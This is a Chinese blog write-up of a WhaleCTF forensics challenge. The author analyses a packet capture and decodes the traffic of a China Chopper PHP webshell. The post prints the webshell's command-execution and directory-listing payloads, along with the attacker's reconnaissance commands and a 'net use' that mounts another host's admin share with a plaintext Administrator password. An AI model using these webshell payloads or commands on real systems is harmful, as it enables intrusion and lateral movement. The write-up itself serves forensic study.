Writeup of 黑客攻击(Misc) in WhaleCTF

最新推荐文章于 2024-04-18 21:15:51 发布
最新推荐文章于 2024-04-18 21:15:51 发布
阅读量1.7k 收藏 1
点赞数
分类专栏: MISC_of_CTF 文章标签: CTF MISC wireshark
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cossack9989/article/details/79241661
版权

题目要求获取Administrator的密码。首先使用wireshark分析流量包。

身为一个web方向重度残疾的二进制手,做这道题真是走了不少弯路。

比如说之前追踪TCP流在文件里找Administrator找password最后啥有用的也没找着(不是很懂黑客攻击的原理OTZ)

后来发现了inetpub\wwwroot,并且猜测黑客应该是用菜刀来取webshell,首先需要访问服务器,于是过滤HTTP包,去看看这个黑客到底干了啥——


  • 依次观察POST过去的数据(base64decode之后);
  • 第1个包: 
    @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D}\t";if(substr($D,0,1)!="/"){foreach(range("A","Z") as $L)if(is_dir("{$L}:"))$R.="{$L}:";}$R.="\t";$u=(function_exists('posix_getegid'))?@posix_getpwuid(@posix_geteuid()):'';$usr=($u)?$u['name']:@get_current_user();$R.=php_uname();$R.="({$usr})";print $R;;echo("|<-");die();

->|c:\inetpub\wwwroot\tC:\tWindows NT ROOT-53DD5427BC 5.2 build 3790 (Windows Server 2003 Enterprise Edition Service Pack 2) i586(NETWORK SERVICE)|<-
  • 第2个包:
    @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
cmd
cd /d "c:\inetpub\wwwroot\"&whoami&echo [S]&cd&echo [E]

->|nt authority\network service\r\n
[S]\r\n
c:\inetpub\wwwroot\r\n
[E] \r\n
|<-
  • 第3个包:
    @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
cmd
cd /d "c:\inetpub\wwwroot\"&arp -a&echo [S]&cd&echo [E]

->| 
Interface: 192.168.30.170 --- 0x10003 
  Internet Address      Physical Address      Type 
  192.168.30.2          00-50-56-e2-70-33     dynamic    
  192.168.30.101        00-0c-29-6e-cf-cb     dynamic    
  192.168.30.184        00-50-56-23-46-15     dynamic    
[S] 
c:\inetpub\wwwroot 
[E]  
|<-
  • 第4个包:
    @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$p=base64_decode($_POST["z1"]);$s=base64_decode($_POST["z2"]);$d=dirname($_SERVER["SCRIPT_FILENAME"]);$c=substr($d,0,1)=="/"?"-c \"{$s}\"":"/c \"{$s}\"";$r="{$p} {$c}";@system($r." 2>&1",$ret);print ($ret!=0)?"
ret={$ret}
":"";;echo("|<-");die();
cmd
cd /d "c:\inetpub\wwwroot\"&net use \\192.168.30.184\C$ "Test!@#123" /u:Administrator&echo [S]&cd&echo [E]

->|.............. 
 
[S] 
c:\inetpub\wwwroot 
[E]  
|<-
  • 第5个包:
    @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
c:\\inetpub\\wwwroot\\

->|./ 2014-11-14 21:55:23 0 0777
../ 2014-09-14 21:21:11 0 0777
aspnet_client/ 2014-09-14 21:21:44 0 0777
backup/ 2014-11-14 22:31:22 0 0777
codeaudit/ 2014-10-19 13:16:56 0 0777
images/ 2014-11-14 21:50:37 0 0777
phpMyAdmin/ 2014-09-13 11:52:02 0 0777
rjzzgc/ 2014-10-14 16:16:02 0 0777
syc/ 2014-09-25 15:06:18 0 0777
1.html 2014-10-03 11:43:46 26 0666
CodeIgniter_2.2.0.zip 2014-10-13 21:07:16 2327811 0666
config.php 2014-11-14 21:04:26 35 0666
form.html 2014-10-03 12:23:50 1529 0666
form1.log 2014-10-03 13:16:37 82 0666
form1.php 2014-10-03 11:57:43 132 0666
form2.log 2014-10-03 12:24:10 83 0666
form2.php 2014-10-03 11:57:52 132 0666
getflag.php 2014-09-29 13:26:32 850 0666
probe.php 2014-10-03 11:50:33 4353 0666
rjzzgc.rar 2014-10-22 20:37:25 424676 0666
test.html 2014-10-12 21:09:53 305 0666
test.php 2014-10-03 11:51:03 70 0666
track.js 2014-10-03 13:22:05 1211 0666
|<-
  • 第6个包:
    @ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."
";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();
\\192.168.30.184\C$\

->|$Recycle.Bin/ 2009-07-14 10:34:39 0 0777
Boot/ 2014-04-25 04:40:17 4096 0777
Documents and Settings/ 2009-07-14 13:06:44 0 0777
PerfLogs/ 2009-07-14 11:20:08 0 0777
Program Files/ 2014-04-24 12:48:06 4096 0555
Program Files (x86)/ 2009-07-14 13:06:53 4096 0555
ProgramData/ 2014-04-24 12:48:06 4096 0777
Recovery/ 2014-04-24 12:45:44 0 0777
System Volume Information/ 2014-04-25 03:41:50 4096 0777
Users/ 2014-04-24 12:51:44 4096 0555
Windows/ 2014-04-24 12:46:28 16384 0777
bootmgr 2010-11-21 11:24:02 383786 0444
BOOTSECT.BAK 2014-04-25 04:40:17 8192 0444
pagefile.sys 2014-11-14 22:42:36 1073741824 0666
|<-

不难发现,攻击过程是——黑客访问服务器,检查了自己的权限并且进行了arp嗅探,准备进行渗透;随后输入密码使用192.168.30.184的Administrator身份,取得了管理员权限;之后就是读文件目录(为所欲为23333)

就这样我们得知了Administrator的password,即 Test!@#123,并且围观了一次“黑客攻击”。

C0ss4ck
关注
专栏目录
每日一题misc——明文攻击
doraemon12345的博客
11-24 1250
把题目下载下来是一大串十六进制,发现是504B开头所以猜测是压缩包文件, 放入winhex里另存为,得到一个压缩包,题目里还有一个提示是到底有几个文件,所以可以联想到可能不止一个文件在里面,如果你懒得看,可以直接分离尝试一下,也可以在winhex或者010editor里查看可以发现有FFD8FF~FFD9这是jpg图片。 放入kali执行foremost命令分离出一张图片和一个压缩包, 图片的crc跟压缩包里的一张图片crc一样,猜测是明文攻击 拿出工具冲它题目很简单,但是也卡了一段时间,因为出题人压缩软件
whaleCTF MISC_Writeup(姿势大全)
Pad0y的博客
04-21 2564
这两天抽空把whaleCTF的MISC部分的题目整理了下,比较基础,writeup写得简陋了些,如有错误欢迎各位师傅指正,持续更新 Find 直接上stegsolve神器,会发现一张反色的二维码,保存下来再反色即可,得到flag flag{hctf_3xF$235#\x5e3} 被我吃了 winhex下可以看到图片包含了一个zip,分离至新文件保存为zip即可得到flag flag{Welcome...
misc明文攻击
huang_q_i的博客
01-11 830
明文攻击超详解及攻击方法工具,附带例题讲解
misc-明文攻击
Luodehahajiang的博客
02-06 1319
大致原理是当你不知道一个zip的密码,但是你有zip中的一个已知文件(文件大小要大于12Byte)或者已经通过其他手段知道zip加密文件中的某些内容时,因为同一个zip压缩包里的所有文件都是使用同一个加密密钥来加密的,所以可以用已知文件来找加密密钥,利用密钥来解锁其他加密文件。
misc压缩文件的明文攻击
Q1n6
04-23 5483
明文攻击。这是到目前为止最智能的一种攻击方法。首先,你需要一些前提条件: -         一个加密的压缩文件 -         了解压缩文件的zip版本(比如加密平台、zip版本号等,可以通过文件属性了解。如果是linux平台,用unzip -v命令可以查看一个zip包的详细信息,包括加密算法等。) -         知道压缩包里某个文件的部分连续内容(至少12字节) 如果你已
CTF---MISC详解
weixin_52796034的博客
11-03 4265
Misc 是英文 Miscellaneous 的前四个字母,杂项、混合体、大杂烩的意思。 Recon(信息搜集) 主要介绍一些获取信息的渠道和一些利用百度、谷歌等搜索引擎的技巧 Encode(编码转换) 主要介绍在 CTF 比赛中一些常见的编码形式以及转换的技巧和常见方式 Forensic && Stego(数字取证 && 隐写分析) 隐写取证是 Misc 中最为重要的一块,包括文件分析、隐写、内存镜像分析和流量抓包分析等等, 涉及巧妙的编码、隐藏数据、层层嵌套的文件中的文件,灵活利用搜索引擎获取所需
De1ctf 2020 -‘check in’ writeup
01-09
CTF(Capture The Flag)竞赛中,"De1ctf 2020 - ‘check in’" 是一道挑战性的安全题目,主要涉及到多个网络安全技术的综合运用,特别是与Web应用程序安全相关的方面。该题目的核心是通过理解并利用服务器配置中...
2018巅峰极客writeup(Misc
Mistsatan
07-30 4382
2018巅峰极客writeup(Misc) 作为一个渣渣,带着去看各路神仙打架的想法报名了这次的“巅峰极客”CTF比赛,7.21第一场线上赛果然从头水到尾。。。 为了方便之后巩固,把近几天学习大佬们的writeup过程中总结整理的内容记录下来,第一次写成博客。
ISCC2015 Writeup MISC - Q7.docx
09-30
ISCC2015 Writeup MISC - Q7.docx
whaleCTF 杂项_Writeup
Pad0y的博客
04-21 2986
Decode1 整道题的一个思路是 hex–&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;ascii–&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;url–&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;base64–&amp;amp;amp;amp;amp;amp;amp;amp;amp;gt;ascii–&amp;amp;amp;amp;amp;amp;amp;a
misc攻防世界新手
舞动的獾
05-07 3968
坚持60s 题目描述: 难度系数: 题目来源: 08067CTF 题目描述:菜狗发现最近菜猫不爱理他,反而迷上了菜鸡 题目场景: 暂无 题目附件: 附件0 解法过程: 进入题目会看到下载的一个附件,是一个Java写的程序,很有意思。 看文件类型,这就需要看出这个程序的基本的对象,就要用到java反编译器,这里使用jd-gui 下载地址: 下载jd-gui后直接解压,需要有Java环境 打开后会看...
攻防世界 - misc部分
qq_45653588的博客
07-25 349
0X00.pdf 下载得到一个PDF文件,打开是一张图片 观察了一下没发现什么异样,尝试Ctrl+a选择全部,发现中间有处阴影 将其复制下来粘贴,得到flag。 0X01. give_you_flag 下载附件得到一张图片,打开后是一张动图,观察了一遍,发现在最后的时候会有一个一闪而过的二维码,于是将其拖入PS中 因为二维码的三个角落的定位符缺失了,无法扫码,所以要先对其进行修补 扫码得到flag。 0X02. stegano 下载附件得到一个PDF文件,满篇的文字,尝试查看文件属性没有什么有用信息
CTF-MISC(Writeup)
最新发布
m0_69764745的博客
04-18 546
题目中说的是数据包,那就应该分析http协议的包,且会在get请求里,接着追踪http流。因为我们要追踪的目的是找到密码,而密码在传输的过程中一般会在ftp的request请求。题目中说是流量,我们应该先想到http包,因此,我们应该筛选http包,并且追踪数据流。实训任务3 数据包中的线索 公安机关近期截获到某网络犯罪团伙在线交流的数据包,但。据,该数据也被该公司截获,你能帮该公司分析他抓取的到底是什么文件的数据吗?看不到图中的flag说明图片的高度太小了,调一下高度就好了。实训任务5秘密藏在了哪里?
第一届赣网杯网络安全大赛 2020GW-CTF Misc_Writeup
末初的CSDN博客
11-07 2429
目录签到CheckinfaceDestroyJavaHidepig 签到Checkin flag{welc0me_to_ganwangbei} face Lennyfuck interpreter https://github.com/Knorax/Lennyfuck_interpreter 跟着对照表替换即可 ++++++++++[->++++++++++<]>++.++++++.<+++[->---<]>--.++++++.<++++[->
BUU-MISC:黑客帝国
yuangun_super的博客
08-05 419
错误思路: 只有一个txt,打开,发现rar文件头,改后缀 不能直接打开 错误原因: 没有完全理解编码,txt上显示的数字与010中显示的十六进制是不一样的。010中的编码是将txt中的内容用Ascll码编码后的结果,如图:txt中显示的52617221到了010中编码为35 32 36 31 37 32 32 31。而文件头是指转换为16进制Ascll码后的数值。所以,本题应该将txt写入rar文件。 正解: 跑个脚本 无提示压缩包解密,ARCHPR爆破 解压后拿到一个无法查看的png,010打
BUU-MISC-黑客帝国
qq_24033605的博客
04-19 273
BUU-MISC-黑客帝国 标准的rar的文件头 利用脚本输出 data='此处放文件' out = open('res.rar','wb') out.write(binascii.unhexlify(hex_data)) out.close() 得到一个加密的压缩包,老样子四位数字爆破 得到一张无法打开的图片,图片的文件头用的是png文件但实际上是jpg文件,所以修改文件头 得到flag ...
CTFshow刷题——misc(一)
qq_45927819的博客
12-10 2799
文章目录miscx miscx 打开压缩包: misc1.zip中有一张图片和一个加密word文档: 先来用stegsolve分析图片: 查看文件信息: flag不在这里,然后我们再仔细看图片,2020,草率了,密码就是2020 进入加密文档后会发现一串音符: 在线解密(音符解密):U2FsdGVkX1/eK2855m8HM4cTq8Fquqtm6QDbcUu4F1yQpA== 根据提示: rabbit解密,密钥也是2020: misc1.zip的作用到此结束,我们继续看hint.txt和fl
BUUCTF在线靶场 部分WEB Writeup(updating)
叶子的Blog
10-12 722
Warmup [极客大挑战 2019]EasySQL 高明的黑客 [CISCN2019 华北赛区 Day2 Web1]Hack World
BUUCTF:黑客帝国
末初的CSDN博客
11-01 4888
题目地址:https://buuoj.cn/challenges#%E9%BB%91%E5%AE%A2%E5%B8%9D%E5%9B%BD 开头很像RAR文件的十六进制数据,利用脚本将这些数据以二进制流形式写入文件
第十二届全国大学生信息安全竞赛WriteUp: Misc与Crypto挑战解析
"本文是关于第十二届全国大学生信息安全竞赛线上初赛的WriteUp,由X10Sec团队分享。比赛涉及Misc签到、Saleae逻辑分析仪数据解析和Crypto谜题等环节,每个环节都需要参赛者具备一定的信息安全技能和解题技巧。" 在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值